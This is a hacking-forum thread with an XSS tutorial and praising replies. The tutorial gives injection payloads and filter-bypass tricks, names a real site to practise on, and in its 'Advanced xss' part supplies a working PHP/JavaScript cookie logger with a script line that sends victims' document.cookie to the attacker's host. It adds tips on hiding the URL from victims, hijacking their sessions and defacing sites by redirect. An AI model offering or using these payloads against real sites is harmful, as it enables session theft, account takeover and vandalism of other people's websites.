Basic xss tutorial

[Phage]

What is XSS?

Xss stands for Cross-site-Scripting and is a web hacking method where you inject HTML or Javascript on the web-page. This attack can be done by submitting queries into text boxes or simply in the URL. The result will be the website reads your query and executes it. Xss is a very powerful method, it can be used to steal someones cookies like you best friend,  the Web-Administrator Or you can use some social-engineering to manipulate people to download a virus that you have created. Such as a Botnet, RAT or even a keylogger. Xss can be a very powerful attack method but can also be very mild. Most of the xss attacks are mild. You can use an alert box to show that the site is vulnerable, you can do this to show the admin that his site is vulnerable. I’m going to give you a few examples of what xss can be used for and how powerful xss can be.



What is HTML?

HTML stands for Hypertext Markup Language, and is the main markup language in websites. HTML is much like a programming language they are both languages, that are used to create attributes and events. You can use HTML to create forms, buttons, and other stuff that can be used in a web page. I highly doubt you will ever encounter a website that does not contain even a slight amount of HTML.



What is Javascript?

First of all there is a HUGE difference between Javascript and Java. Java is a programming language that are fairly similar to c++ and are used to create games and applications. Javascript isn’t used nearly as much as HTML. It is used more in applications outside of the website. Javascript can be an incredibly useful language among with HTML and they are both two languages you can’t get pass if you want to master XSS or hack websites.



Your first xss attack

In this section i will teach you how to perform a XSS attack and how to find XSS vulnerabilities. If you already know the basic of xss you can skip this part.

So where can you find xss vulnerabilities? They are found in search boxes, url’s, signup forms etc. Basically in every text area where you can input something.I will use this site as an example: http://www.leksikon.org/ .On the site you can see a search box, and that is where you are going to make your first xss attack.So lets take the most used basic query of all time and paste it in the search box.

Code: [Select]

<script>alert("xss")</script>

That little script is HTML and will basically make an alert box saying xss. If you get a pop up box saying “xss”, you have successfully performed your first xss attack. You can make it saying something else by simply editing the part that says “xss”. ex.

Code: [Select]

<script>alert(“you text goes here”)</script>

But what if nothing happens? Don't worry that just means that the website have taken some time to put a filter on it. That means they have installed a filter that checks for malicious (dangerous) content, like HTML and Javascript. It will therefore block the script and preventing it from executing. But fortunately there are methods to bypass the filter. We can do that by encrypting the script. We will be using a little function called “String.FromCharCode”. It will encrypt the script into ASCII. An example of this could be:

Code: [Select]

<script>alert(String.fromCharCode(88,83,83))</script>

That script is doing the exactly same thing as this script:

Code: [Select]

<script>alert(“xss”)</script>Advanced xss

In this section i will show you how to use xss in malicious ways. But remember all malicious attacks sent to a website, server etc. is illegal and can be prosecuted. I will not be responsible for what you are using this information to.


Cookie logger:

A cookie logger is used to log the targets cookies in a .txt file. This is the most malicious thing we can do with a non-persistent xss. The way i am going to show you is a three steps method.First of setup an account on a free hosting service. Personally i find www.000webhost.com as the best. Once you done that create a file on the root folder and call it CookieLogger.txt leave the text file empty. It is in that file the cookie logger will save the cookies it logs. Now create another file called CookieLogger.php remember the extension .php . In that file insert this code:

Code: [Select]

<?php/** Created on 16. april. 2007* Created by Audun Larsen (audun@munio.no)** Copyright 2006 Munio IT, Audun Larsen** THIS SOFTWARE IS PROVIDED BY THE AUTHOR ``AS IS'' AND ANY EXPRESS OR IMPLIED WARRANTIES,* INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS* FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE* FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES* (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS;* OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,* OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE,* EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.*/if(strlen($_SERVER['QUERY_STRING']) > 0) {    $fp=fopen('./CookieLog.txt', 'a');    fwrite($fp, urldecode($_SERVER['QUERY_STRING'])."\n");    fclose($fp);} else {?>var ownUrl = 'http://<?php echo $_SERVER['HTTP_HOST']; ?><?php echo $_SERVER['PHP_SELF']; ?>';// ==//  URLEncode and URLDecode functions//// Copyright Albion Research Ltd. 2002// http://www.albionresearch.com///// You may copy these functions providing that// (a) you leave this copyright notice intact, and// (b) if you use these functions on a publicly accessible//  web site you include a credit somewhere on the web site//  with a link back to http://www.albionresearch.com///// If you find or fix any bugs, please let us know at albionresearch.com//// SpecialThanks to Neelesh Thakur for being the first to// report a bug in URLDecode() - now fixed 2003-02-19.// And thanks to everyone else who has provided comments and suggestions.// ==function URLEncode(str){    // The Javascript escape and unescape functions do not correspond    // with what browsers actually do...    var SAFECHARS = "0123456789" +        // Numeric        "ABCDEFGHIJKLMNOPQRSTUVWXYZ" +    // Alphabetic        "abcdefghijklmnopqrstuvwxyz" +        "-_.!~*'()";        // RFC2396 Mark characters    var HEX = "0123456789ABCDEF";    var plaintext = str;    var encoded = "";    for (var i = 0; i < plaintext.length; i++ ) {        var ch = plaintext.charAt(i);        if (ch == " ") {            encoded += "+";                // x-www-urlencoded, rather than %20        } else if (SAFECHARS.indexOf(ch) != -1) {            encoded += ch;        } else {            var charCode = ch.charCodeAt(0);            if (charCode > 255) {                alert( "Unicode Character '"    + ch    + "' cannot be encoded using standard URL encoding.\n" +                    "(URL encoding only supports 8-bit characters.)\n" +          "A space (+) will be substituted." );                encoded += "+";            } else {                encoded += "%";                encoded += HEX.charAt((charCode >> 4) & 0xF);                encoded += HEX.charAt(charCode & 0xF);            }        }    } // for    return encoded;};cookie = URLEncode(document.cookie);html = '<img src="'+ownUrl+'?'+cookie+'">';document.write(html);< ?php}?>


Once you done that you can sent the script to your victim, and it will log the victims cookies. This is the script you shall add to your xss vulnerability:

Code: [Select]

<script>document.location="http://www.host.com/mysite/CookieLogger.php?cookie=" + document.cookie;</script>

I will definitely recommend you to tiny the URL otherwise it will not be hard for the victim to guess what is going on.One you have got the cookies you can use a Firefox addon called “cookie manager” to manipulate and edit the cookie so you can hijack the victims session.



Defacing with xss

Defacing is often what people do when they have admin privileges to a website. This is often done to show the admin that the security have been breached. If you want to deface with HMTL you shall find a persistent xss in the site. Once you have found your persistent xss vulnerability you want it to redirect to your deface page. I will highly recommend you to upload your deface page to www.pastehtml.com since it has anonymous upload. The script you shall use to redirect to your deface page is:

Code: [Select]

<script>window.location="http://www.pastehtml.com/YOURDEFACEHERE/";</script>
Techniques to bypass xss filters

Sometimes the basic script doesn’t do the trick. That’s because the website hav a WAF or filter installed. What it does is it blocks as many xss and SQLi queries as it can. There are many ways of bypassing the filter, but i will only cover three of them. If none of these techniques works drop me a PM and i will take a look on it. Hex bypassing:This is one of the easiest filter bypassing techniques. If the site blocks characters like >, < and / you can use this method to bypass it. the hex of a certain character is basically the same character in a different format. The hex for

the characters mentioned above goes like this:< = %3c> = %3c/ = %2f


ASCII bypassing:If the website blocks this character “ you can use ASCII encryption to bypass it. This is one of the most common xss filter bypass techniques of all time. Here is an example of how it works.Lets take this script as an example:

Code: [Select]

<script>alert(“xss”)</script>

After we have encrypted it, it will look like this:

Code: [Select]

<script>alert(String.fromCharCode(88,83,83))</script>

To encrypt your scripts go to this site: http://www.wocares.com/noquote.phpYou can also install a Firefox addon called Hackbar. It’s a tool that i’m sure you will find very useful when dealing with website hacking.Case-sensitive bypassing:Well this method will rarely work, but it’s worth a shot. Some filters, some very old ones can be bypassed with writing a script with different sizes of characters. An example of this would go like this:

Code: [Select]

<sCrIpT>aLeRt(“xss”)</sCrIpT>


You can if you want mix it with ASCII.


First of all thanks for reading this. I hope this has teached you the basics of xss. I’m going to make some more advanced xss tutorials later, but for now i hope this will be enough. If you have any question related to xss drop me a PM and i will be glad to help you out.

[Conch]

Wow, really nice tutorial.
I skimmed through it, and it looks nice.
I'm going to read it all now and bookmark it

[Phage]

Wow, really nice tutorial.
I skimmed through it, and it looks nice.
I'm going to read it all now and bookmark it

Thank you very much, I'm really appreciating it !

[lordarnoud]

I've read your tutorial and in my opinion it was easy to follow and made sense I'm not an expert on XSS so I'm not sure if everything you said is correct or complete but yeah thanks for the tutorial

[Phage]

I've read your tutorial and in my opinion it was easy to follow and made sense I'm not an expert on XSS so I'm not sure if everything you said is correct or complete but yeah thanks for the tutorial

Thank you, i have really tried to make it as easy as possible.

[Axon]

http://www.hackcommunity.com/Thread-TUT-Basic-xss-tutorial-TUT

Did you snatch it from this forum?

[Phage]

http://www.hackcommunity.com/Thread-TUT-Basic-xss-tutorial-TUT

Did you snatch it from this forum?

Dude that is me, the reason that i do not have the same name is that i can't change it in here

I would never steal someones work and don't give them credit for it!

Here is a prove if you don't believe me:
http://i.imgur.com/pqCbQ.png

Best regards
Narraz,  Anima Templi

[ande]

You dont need to tag your subject with [TUT] tags when the topic is in a tutorial board, even the word tutorial is not really neccesary. Nonetheless, the tutorial looks okay at first glance. I will read it more carefully once I have time, probably a few days.

[Phage]

You dont need to tag your subject with [TUT] tags when the topic is in a tutorial board, even the word tutorial is not really neccesary. Nonetheless, the tutorial looks okay at first glance. I will read it more carefully once I have time, probably a few days.

thank you i hope you will find it usefull.

[_SpyMachine]

Awesome!


I must have seen a thousand XSS scripting tutorials, but none of them ever actually seem to get past <script>alert('xss')</script>  .  This actually went in depth and showed how you can exploit the victim. kudos!


For people who read that and sort of understood it, I would really suggest just setting up your own fake website that is susceptible to XSS and learn how to exploit it.  This will really teach you one, how XSS really works, and two, how you can defend against it.

[Phage]

Awesome!


I must have seen a thousand XSS scripting tutorials, but none of them ever actually seem to get past <script>alert('xss')</script>  .  This actually went in depth and showed how you can exploit the victim. kudos!


For people who read that and sort of understood it, I would really suggest just setting up your own fake website that is susceptible to XSS and learn how to exploit it.  This will really teach you one, how XSS really works, and two, how you can defend against it.

Thank you, I have putted a lot of work in it, and I'm happy to see you like it.

[ande]

Alright, just read it in depth.

The tutorial is just fine, its not exactly how I would have written it but not far from, not that my way of writing it would be the correct answer anyway. The only thing that annoys me is the grammatical errors, not typos but just structure-wise wrong. Not a big problem tho. It is easy to understand nonetheless.

Like I said, there is a couple of things I would have done differently. So perhaps I will use this as a base if I ever get the time to write one myself. I will of course credit you for it hehe.


I am looking forward to reading more from you

[Phage]

Alright, just read it in depth.

The tutorial is just fine, its not exactly how I would have written it but not far from, not that my way of writing it would be the correct answer anyway. The only thing that annoys me is the grammatical errors, not typos but just structure-wise wrong. Not a big problem tho. It is easy to understand nonetheless.

Like I said, there is a couple of things I would have done differently. So perhaps I will use this as a base if I ever get the time to write one myself. I will of course credit you for it hehe.


I am looking forward to reading more from you

I'm currently working on a website so i didn't had the time to check it for grammatical errors. But this is something that i will take look on, when my website is  online. I have actually just finished a tutorial on basic SQL injection, I'm planning to release it soon. I would actually like to see how you would write it 

regards
Narraz